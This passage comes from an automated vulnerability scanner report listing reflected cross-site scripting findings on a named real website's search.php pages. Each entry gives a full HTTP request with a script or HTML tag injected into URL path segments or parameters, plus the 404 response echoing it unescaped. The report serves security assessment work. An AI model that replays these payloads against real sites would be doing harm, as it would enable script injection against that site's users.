GET /adult/media-chat/themes/kosmos5b52b<script>alert(1)</script>2a8d2374a43/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos5b52b<script>alert(1)</script>2a8d2374a43/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.139. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2bb3e<script>alert(1)</script>a1cce950054 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images2bb3e<script>alert(1)</script>a1cce950054/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images2bb3e<script>alert(1)</script>a1cce950054/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.140. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 89eff<script>alert(1)</script>6824ae2567c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review89eff<script>alert(1)</script>6824ae2567c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review89eff<script>alert(1)</script>6824ae2567c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.141. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4e30c<script>alert(1)</script>e5e22f8a0f5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php4e30c<script>alert(1)</script>e5e22f8a0f5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php4e30c<script>alert(1)</script>e5e22f8a0f5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.142. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c29f5<a>62ebc666ddd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc29f5<a>62ebc666ddd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc29f5<a>62ebc666ddd&opt=2 was not found on this server.</p>
...[SNIP]...

2.143. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65ccc<a>115fd774aa6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...65ccc<a>115fd774aa6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...65ccc<a>115fd774aa6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.144. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18ce2<script>alert(1)</script>7f68e9f9f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&18ce2<script>alert(1)</script>7f68e9f9f31=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&18ce2<script>alert(1)</script>7f68e9f9f31=1 was not found on this server.</p>
...[SNIP]...

2.145. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c3d7f<a>8e2b502571b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c3d7f<a>8e2b502571b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c3d7f<a>8e2b502571b was not found on this server.</p>
...[SNIP]...

2.146. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c620e<script>alert(1)</script>679bc3bf1eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc620e<script>alert(1)</script>679bc3bf1eb/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc620e<script>alert(1)</script>679bc3bf1eb/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.147. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f726b<script>alert(1)</script>7fe79ebd066 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatf726b<script>alert(1)</script>7fe79ebd066/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf726b<script>alert(1)</script>7fe79ebd066/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.148. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fd583<script>alert(1)</script>5575119c5bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesfd583<script>alert(1)</script>5575119c5bb/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesfd583<script>alert(1)</script>5575119c5bb/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.149. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fc3f<script>alert(1)</script>7961829ed26 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos4fc3f<script>alert(1)</script>7961829ed26/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos4fc3f<script>alert(1)</script>7961829ed26/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.150. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 64fed<script>alert(1)</script>b229029b47c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images64fed<script>alert(1)</script>b229029b47c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images64fed<script>alert(1)</script>b229029b47c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.151. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e8edd<script>alert(1)</script>d5b9452e74e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/search.phpe8edd<script>alert(1)</script>d5b9452e74e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.phpe8edd<script>alert(1)</script>d5b9452e74e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.152. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7f8dc<a>c7aea4a1b23 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f8dc<a>c7aea4a1b23&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f8dc<a>c7aea4a1b23&opt=2 was not found on this server.</p>
...[SNIP]...

2.153. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bd10a<a>568f266672 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...bd10a<a>568f266672&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...bd10a<a>568f266672&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.154. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 685bc<script>alert(1)</script>be72e11b98f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&685bc<script>alert(1)</script>be72e11b98f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&685bc<script>alert(1)</script>be72e11b98f=1 was not found on this server.</p>
...[SNIP]...

2.155. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1cb22<a>48447151198 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21cb22<a>48447151198 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
